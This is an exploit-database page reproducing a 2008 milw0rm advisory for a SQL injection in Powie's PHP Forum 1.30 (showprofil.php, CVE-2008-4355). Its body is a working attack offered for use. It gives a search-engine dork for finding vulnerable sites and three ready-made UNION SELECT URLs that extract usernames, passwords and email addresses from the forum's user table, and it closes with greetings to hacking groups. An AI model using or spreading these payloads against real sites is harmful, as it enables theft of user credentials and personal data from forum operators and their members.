[] NeoSense
E X P L O I T S
title author type platform port cve id

pForum 1.30 - 'showprofil.php' SQL Injection

Author: tmh
type: webapps
platform: php
port: 
date_added: 2008-09-11 
date_updated: 2016-12-22 
verified: 1 
codes: OSVDB-48109;CVE-2008-4355 
tags: 
aliases:  
screenshot_url:  
application_url: 
#=====================================================================================================
#Powie's PHP Forum <= v1.30 (showprofil) Remote SQL Injection Exploit
#=====================================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://www.powie.de
#
#Version : v1.30
#
#=====================================================================================================
#
#DORK : "pForum 1.30"
#
#
#Exploit :
#--------------------------------
#
#FOR USER: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,username)+FROM+pfuser+limit+1,1--
#FOR PASS: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,pwd)+FROM+pfuser+limit+1,1--
#FOR MAIL: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,emai)+FROM+pfuser+limit+1,1--
#
#=====================================================================================================
#Discoverd By : -tmh-
#
#Contact : tmh[at]sys-flaw.com
#
#Greetz To : n00bor , Five-Three-Nine , J0hn.X3r , electron1x , meckl, Floo , -Patrick_B ,
#	           Loader007 , bizzit , Sys-Flaw , Codesoft , Free-Hack  abcdef ,
#
#
#=====================================================================================================

# milw0rm.com [2008-09-12]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.